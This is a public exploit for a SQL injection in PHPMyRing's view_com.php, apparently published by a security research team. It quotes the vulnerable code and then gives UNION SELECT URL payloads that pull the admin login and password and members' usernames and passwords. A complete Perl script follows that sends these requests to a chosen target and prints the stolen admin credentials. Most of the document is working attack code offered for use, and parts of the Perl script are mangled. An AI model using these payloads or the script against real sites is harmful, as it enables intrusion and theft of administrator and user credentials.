####################################################################### # # PHPMyRing's (view_com.php) Remote SQL injection Exploit # # vulnerable code on view_com.php line ( 14 - 24) # # [code] # ----------------------------------------------------------------------------------- # if (!$idsite) # { # echo "

"._("Erreur! Le n° du site n'est pas défini!")."

"; # } # else # { # // On va aller chercher le nom du site consernÚ, ša sera fait ;) # // Connexion MySQL # $conn=connecte(); # $row=mysql_fetch_array(requete("SELECT site_nom FROM webring WHERE idsite=$idsite")); # <== SQL injection # $site_nom=$row['site_nom']; # # ............... # # # "> # # <? echo _("Commentaires du site"). " ".$site_nom; ?> # ---------------------------------------------------------------------------------[/code] # # $idsite is not proprelly verified and can be used to inject sql some query # #=========== # Exploit : #=========== # # http://localhost/webring/view_com.php?idsite=[SQL] # #=========== # Exemples : #=========== # # [+] the first PoC URL will display admin username in page title and the second admin password # # http://localhost/webring/view_com.php?idsite=-1%20UNION%20SELECT%20loginadm%20FROM%20webring_adm # # http://localhost/webring/view_com.php?idsite=-1%20UNION%20SELECT%20passadm%20FROM%20webring_adm # # # [+] this will display members username (1) and password(2) in page title # # 1) http://localhost/webring/view_com.php?idsite=-1%20UNION%20SELECT%20pseudo%20FROM%20webring%20WHERE%20idsite=[victimesiteid] # # 2) http://localhost/webring/view_com.php?idsite=-1%20UNION%20SELECT%20mdp%20FROM%20webring%20WHERE%20idsite=[victimesiteid] # # Exploit to extract both admin login and plain text password: # # C:\>perl ring.pl 127.0.0.1 webring # ################################################# # # PHPMyRing's Remote SQL injection Exploit # # # Discovered by simo64_at_morx_org # # # Script writting by simo_at_morx_org # # # MorX Security Research Team # # # www.morx.org # # ################################################# # [*] Trying to get the admin login ... # [+] your admin login is --> admin # [+] your admin pass is --> 123456 use IO::Socket; if(!defined($ARGV[0] && $ARGV[1])) { system (clear); print "\n"; print "#################################################\n"; print "# PHPMyRing's Remote SQL injection Exploit #\n"; print "# Discovered by simo64_at_morx_org #\n"; print "# Script writting by simo_at_morx_org #\n"; print "# MorX Security Research Team #\n"; print "# www.morx.org #\n"; print "#################################################\n\n"; print "--- Usage: perl $0 \n"; print "--- Example: perl $0 127.0.0.1 afd_webring\n\n"; exit; } $TARGET = $ARGV[0]; $FOLDER = $ARGV[1]; $PORT = "80"; $SCRIPT = "/view_com.php?idsite="; $SQLPASS = "-1%20UNION%20SELECT%20passadm%20FROM%20webring_adm"; $SQLADMIN = "-1%20UNION%20SELECT%20loginadm%20FROM%20webring_adm"; ################################################################################ $COMMAND1 = "GET /$FOLDER$SCRIPT$SQLADMIN HTTP/1.1"; $COMMAND2 = "Host: $TARGET"; $COMMAND3 = "Connection: Close"; $COMMAND4 = "GET /$FOLDER$SCRIPT$SQLPASS HTTP/1.1"; $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET",PeerPort=>"$PORT") || die "Can't connect to $TARGET"; print "#################################################\n"; print "# PHPMyRing's Remote SQL injection Exploit #\n"; print "# Discovered by simo64_at_morx_org #\n"; print "# Script writting by simo_at_morx_org #\n"; print "# MorX Security Research Team #\n"; print "# www.morx.org #\n"; print "#################################################\n\n"; sleep 2; print "[*] Trying to get the admin login ...\n\n"; print $remote "$COMMAND1\n$COMMAND2\n$COMMAND3\n\n"; while ($result = <$remote> ) { if ($result =~ /site (.*?) $adminlogin\n\n"; $a = 1; } } if ($a == 0) { print "[-] Failed, cant get the admin login\n\n"; print "[*] Trying to get the admin password ...\n\n"; } $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET",PeerPort=>"$PORT") || die "Can't connect to $TARGET"; print $remote "$COMMAND4\n$COMMAND2\n$COMMAND3\n\n"; while ($result2 = <$remote> ) { if ($result2 =~ /site (.*?) $adminpass\n\n"; $b = 1; } } if ($b == 0) { print "[-] Failed, cant get the admin password\n"; } $remote->flush(); close($remote); exit;